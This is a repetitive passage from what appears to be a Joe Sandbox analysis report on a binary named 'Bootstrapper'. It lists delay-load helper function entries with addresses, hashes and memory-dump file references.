Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: bcf7161e67eb53ff14f39e44f61398a2c6ff14e1a8814c756e4780b7dffd065e
Instruction ID: 9a9e9411c88fa3ea7de5a64887177116cf10f8ea8143d3f2002901d6700da652
Opcode Fuzzy Hash: bcf7161e67eb53ff14f39e44f61398a2c6ff14e1a8814c756e4780b7dffd065e
Instruction Fuzzy Hash: BEB012F139B140BC310851252C0BCF7114DD5C2B10730B03EFC06F0280D840EC810531

Function 00E1E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 9b3ce1e1d94a9bc5f290df29533dfcfa06d8b9a9c9ac49ad72190bae3f8fa920
Instruction ID: fe2729520db740f204bc47b8aa18655630ccb5c199cf1a51c30eac915372df7a
Opcode Fuzzy Hash: 9b3ce1e1d94a9bc5f290df29533dfcfa06d8b9a9c9ac49ad72190bae3f8fa920
Instruction Fuzzy Hash: F3B012F139B240BD314852252C0BCF7114DD5C1B10730713EFC06F0280D840ACC50531

Function 00E1E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 0293805a168fc85a589ca7ebc55c7af170f2374305004924c9f70d7f201fd23c
Instruction ID: 178a3d4d80ae92c0b8a85791502920bc69e07f0dc77f12efb59f758e6c418f5c
Opcode Fuzzy Hash: 0293805a168fc85a589ca7ebc55c7af170f2374305004924c9f70d7f201fd23c
Instruction Fuzzy Hash: C5B012F139A200BD314851252C0BCF7014CD4C1F10330713EFC06F0281D840ADC10571

Function 00E1E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 8f19e44a4b5600cfa3b5d7a1a47c14bbe45a5cfe6b61dc88533d80b410693a12
Instruction ID: 6993a3a4fedcfe7352210d29121f74e4a839574a41f772ebd74f68e315a07bbc
Opcode Fuzzy Hash: 8f19e44a4b5600cfa3b5d7a1a47c14bbe45a5cfe6b61dc88533d80b410693a12
Instruction Fuzzy Hash: 63B012F139A100BC310855252D0BCF7014CD4C1F10330703EFC06F0281DC40AE820531

Function 00E1E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: db037d750de7a9b6e24f420011a2e9b530923433cd9e38531900d400a6cfc277
Instruction ID: 45d887969c769a7e063d4f4e551036953b01359ad36dd79ec53a0ff488ea5c6a
Opcode Fuzzy Hash: db037d750de7a9b6e24f420011a2e9b530923433cd9e38531900d400a6cfc277
Instruction Fuzzy Hash: 91B012F139A100BC310851262C0BCF7014CE4C1F10330703EFC06F0281D840AD810531

Function 00E1E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 28f58d149d52d0c454ec3768723aebe6fd479070030a541cd7fe2d5904b8dc99
Instruction ID: 33258b9870517a0cb993c9f680ddf3acbe670b7106764d0adee44e69236c5e90
Opcode Fuzzy Hash: 28f58d149d52d0c454ec3768723aebe6fd479070030a541cd7fe2d5904b8dc99
Instruction Fuzzy Hash: FCB012F13AA240BD314852252C0BCF7014CD4C1B20330B23EFC06F0381D840ACC50531

Function 00E1E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD, 00E1E20A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 55ab02786872948a3121e8acd606afa561d69b5b7f5d09844de0d34c3f5b67ea
Instruction ID: 66c917dc6adc3fda00ce2f04667628cba0de5ce9412f137e5657d085b87ad211
Opcode Fuzzy Hash: 55ab02786872948a3121e8acd606afa561d69b5b7f5d09844de0d34c3f5b67ea
Instruction Fuzzy Hash: 99B012F139A100BC310852252D0BCF7014CD4C1B20330B13EFC06F0381DC50AD8A0531

Function 00E1E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 8a9495fd858a458c7a9a572e7ca875b8c8c47dca55983c7a2b04ca6d73749f8b
Instruction ID: 863b5bd3a6477540cd803b18b3f8ff32e692ac86980a0ef7fa60fb3115d7358c
Opcode Fuzzy Hash: 8a9495fd858a458c7a9a572e7ca875b8c8c47dca55983c7a2b04ca6d73749f8b
Instruction Fuzzy Hash: 75B012F139A100BC310851252C0BCF7014CD4C2F10330B03EFC06F0281D840ED850531

Function 00E1E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E580

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

Fjun, xrefs: 00E1E57A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun
API String ID: 1269201914-1717936292
Opcode ID: 00f28ff26f769abcdd77d524cd6f6bf3c91962a5428d63f4fac2ba2cf93eb314
Instruction ID: ea94bd740397dd556f90ad1df890b4d296ee8dc1b1a98e709c6e1835d1320ba6
Opcode Fuzzy Hash: 00f28ff26f769abcdd77d524cd6f6bf3c91962a5428d63f4fac2ba2cf93eb314
Instruction Fuzzy Hash: 05B012E16992007C310851646D07CB745ADC4C1F10374722EFC04F1280EC404D820531

Function 00E1E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E580

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

Fjun, xrefs: 00E1E57A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun
API String ID: 1269201914-1717936292
Opcode ID: f6e01ed89361aeb03ce7d182d6606f53c13f88ca3bb48c1723ad20052766bea5
Instruction ID: 96db915b5164e4858b0655c8ae383a482d782422055562a2adbd2f275b696635
Opcode Fuzzy Hash: f6e01ed89361aeb03ce7d182d6606f53c13f88ca3bb48c1723ad20052766bea5
Instruction Fuzzy Hash: CDB012E16993007D314851646C07CB705ADC4C1F10334722EFC04F1280E8404CC10531

Function 00E1E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E580

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

Fjun, xrefs: 00E1E57A, 00E1E593

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun
API String ID: 1269201914-1717936292
Opcode ID: 665617811dd496815a528854d28907ecee018fff2c86cb73c9d0786db26faf4e
Instruction ID: 5998e9cb3ac76115d462a88a66feee5dcff1cd06c7aa22c6050026b23daecd1c
Opcode Fuzzy Hash: 665617811dd496815a528854d28907ecee018fff2c86cb73c9d0786db26faf4e
Instruction Fuzzy Hash: 46B012E169A2007D310851642C07CB7018DD4C1F20330702EFC04F1680E8404C810531

Function 00E1E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

PDu<, xrefs: 00E1E519, 00E1E546

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<
API String ID: 1269201914-576538559
Opcode ID: cffe0992be73548cf342d634067d3a808818f59371d48c5ac9bd68bac99ada2d
Instruction ID: f7c810e32063dc1d1c7b36ff02d61420a338482f1b2d59c866d3a9ec698015ca
Opcode Fuzzy Hash: cffe0992be73548cf342d634067d3a808818f59371d48c5ac9bd68bac99ada2d
Instruction Fuzzy Hash: 3AB012E12982007C324852186C07CBB095EC4C1F10330722EFC04F0280E8404CC90631

Function 00E1E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<
API String ID: 1269201914-576538559
Opcode ID: eee705e69b5b84b5a8349e7619d4eca2b5e208bcc083b061d2e66591bdb8acd1
Instruction ID: ab9be19c244f2fedc6e3683a5114431093f896623adf3eafdb67d7f16fd4142f
Opcode Fuzzy Hash: eee705e69b5b84b5a8349e7619d4eca2b5e208bcc083b061d2e66591bdb8acd1
Instruction Fuzzy Hash: 6DB012E129C1007C310812342C0BCBB050FC4C1F10730703EFC10F05C1A8404D890531

Function 00E1E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 3d6f66b04be68cfd59a86d3344aeaef1b563ed29c0a705cde02b6c3e12ff84bb
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: 3d6f66b04be68cfd59a86d3344aeaef1b563ed29c0a705cde02b6c3e12ff84bb
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 3e60ec25b902e287a77e04ea8c880330031343f0dd7c7c974d916ea2b927ff14
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: 3e60ec25b902e287a77e04ea8c880330031343f0dd7c7c974d916ea2b927ff14
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 6476178ed3e247a3359cabad45e0b3aca346176c98d43b9043308482f2a25d3f
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: 6476178ed3e247a3359cabad45e0b3aca346176c98d43b9043308482f2a25d3f
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
